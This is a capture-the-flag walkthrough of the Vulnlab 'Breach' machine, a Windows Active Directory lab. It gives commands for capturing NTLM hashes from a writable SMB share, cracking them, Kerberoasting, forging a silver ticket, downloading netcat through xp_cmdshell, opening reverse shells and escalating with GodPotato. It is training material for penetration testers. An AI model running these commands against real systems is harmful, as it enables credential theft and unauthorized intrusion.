Breach - Vulnlab



Let's start by scanning all tcp ports using nmap.
Pasted image 20241015174548.png
I have DNS(port 53), IIS(port 80), Kerberos(port 88), RPC(port 135), LDAP(port 389), SMB(port 445), MSSQL(port 1433), RDP(port 3389).


Donwload it from this link.
chmod +x rustscan_2.0.1_amd64.deb
sudo dpkg -i filename

Now let's enumerate target machine.
rustscan -a
Pasted image 20241015175133.png
I found out WinRM(port 5985) aswell.

Let's add domain breach.vl and subdomain BREACHDC.breach.vl to /etc/hosts.
echo ' breach.vl BREACHDC.breach.vl' | sudo tee -a /etc/hosts
Pasted image 20241015172750.png
Now let's enumerate SMB.

SMB - port 445

Null Session - Netexec

Let's enumerate all available shares with a Null session using netexec.
nxc smb -u "anon" -p "" --shares
Pasted image 20241015175955.png
I have read privileges as anon user on IPC$, share and Users and write privileges on share aswell.

Since i have write privileges on share let's access it and see its content.
smbclient -U 'anon' //
cd transfer
Pasted image 20241015180348.png
Since there is several users sharing this share let's upload a file here and use Responder to wait for access.

Get NTLM Hash from SMB share - Hashgrab & Responder

I use hashgrab script to create several type of files using my local IP so i can upload to SMB and wait for a connection.
cd /home/kali/Tools/hashgrab
source venv/bin/activate
python3 test
Pasted image 20241015180749.png
Now let's move test.lnk to SMB share and initiate Responder.
mv test.lnk /home/kali/oscp/Breach-vul
smbclient -U 'anon' //
cd transfer
put test.lnk
Pasted image 20241015181057.png
responder -I tun0 -v
Pasted image 20241015181457.png
Now that i have NTLMv2 hash let's crack it.

Crack NTLMv2-SSP Hash

We catch the Julia.Wong hash now lets crack him using hashcat.
nano hash.txt


hashcat -m 5600 hash.txt /usr/share/wordlists/rockyou.txt -o cracked.txt
cat cracked.txt
Pasted image 20241015181729.png
I have Julia.Wong:Computer1 so let's try to access by WinRM on target machine.
evil-winrm -i breach.vl -u Julia.Wong -p 'Computer1'
Pasted image 20241015181907.png
I can't have access by WinRM so let's try to do Kerberoasting with this credential.

Kerberos - port 88

Kerberoasting - GetUserSPNs

impacket-GetUserSPNs -dc-ip breach.vl/Julia.Wong:'Computer1' -request
Pasted image 20241015182301.png
I got KRB_AP_ERR_SKEW error so let's synchronize the clock to the target machine's clock.
ntpdate -u BREACHDC.breach.vl
rdate -n BREACHDC.breach.vl
impacket-GetUserSPNs -dc-ip breach.vl/Julia.Wong:'Computer1' -request
Pasted image 20241015182615.png
I notice that svc_mssql is vulnerable to Kerberoasting so let's crack his hash.

Crack Kerberos Hash - John

Let's create a file with its hash.
nano hash
Now let's crack it with john the Ripper.
john hash -w=/usr/share/wordlists/rockyou.txt
Pasted image 20241015182843.png
I have credentials svc_mssql:Trustno1 so I accessed WinRM but it didn't work.
Let's check if i can get access to mssql with netexec.
nxc mssql -u 'svc_mssql' -p 'Trustno1'
Pasted image 20241015183615.png

MSSQL - port 1433

impacket-mssqlclient 'breach.vl/svc_mssql':'Trustno1'@ -dc-ip -windows-auth
Pasted image 20241015184057.png

Available Databases

Let's check what are available databases are there.
SELECT name FROM master..sysdatabases;
Pasted image 20241015184136.png
There are 4 databases that are usual to exist so let's try a different approach.

Kerberos - port 88

Silver Ticket Attack - impacket-ticketer

I need 3 things Domain SID, User NTLM hash and User SPN.

Domain SID -  impacket’s lookupsid

impacket-lookupsid breach.vl/svc_mssql:'Trustno1'@
Pasted image 20241015190139.png
I got Domain SID S-1-5-21-2330692793-3312915120-706255856.

Convert plaintext password to NTLM password

Now let's convert plain text password to NTLM password with this link.
Pasted image 20241015190332.png
I have NTLM password hash 69596C7AA1E8DAEE17F8E78870E25A5C.

SPN (Service Principal Name) - GetUserSPNs

ntpdate -u BREACHDC.breach.vl
rdate -n BREACHDC.breach.vl
impacket-GetUserSPNs -dc-ip breach.vl/svc_mssql:'Trustno1' -request
Pasted image 20241015190805.png
I got SPN MSSQLSvc/breachdc.breach.vl:1433 so let's do Silver Ticket Attack.
impacket-ticketer -nthash '69596C7AA1E8DAEE17F8E78870E25A5C' -domain-sid 'S-1-5-21-2330692793-3312915120-706255856' -domain breach.vl -spn 'MSSQLSvc/breach.vl:1433' -user-id 500 Administrator
Pasted image 20241015191011.png

Export the Ticket

Pasted image 20241015191048.png
We can use the ticket to gain access to the mssql server.
impacket-mssqlclient -k -no-pass breach.vl -windows-auth
Pasted image 20241015191243.png
Now that i have Administrator privileges i can use xp_cmdshell to execute commands.

MSSQL - Administrator - xp_cmdshell

Upload nc64.exe

cd /home/kali/Tools/Kali-Network-Pentesting-Tools/ADtools/
python3 -m http.server 8888
Pasted image 20241015192922.png
xp_cmdshell powershell -c "mkdir C:\Temp"
xp_cmdshell powershell -c "wget -usebasicparsing -o c:\Temp\nc64.exe"

Execute nc64.exe with xp_cmdshell

Now let's initiate a netcat listener and execute nc64.exe on target machine with xp_cmdshell.
nc -lvnp 443
xp_cmdshell powershell -c "C:\Temp\nc64.exe -e cmd 443"
Pasted image 20241015194519.png

Privilege Escalation

User Privileges - SeImpersonatePrivilege - God Potato

Let's try to see what privielges does svc_mssql has.
whoami /priv
Pasted image 20241015194818.png
Download the GodPotato on the local machine, transfer it to the target machine, and transfer Netcat too.
cd /home/kali/Tools
python3 -m http.server 8080
cd C:\programdata
C:\Windows\System32\certutil -urlcache -split -f
Now run the GodPotato-NET4.exe in the target system while we have a listener.
nc -lvnp 4040
GodPotato-NET4.exe -cmd "C:\Temp\nc64.exe -e C:\Windows\System32\cmd.exe 4040"
Pasted image 20241015200638.png
Pasted image 20241015200734.png
Now let's find root flag.
dir C:\Users\Administrator\Desktop
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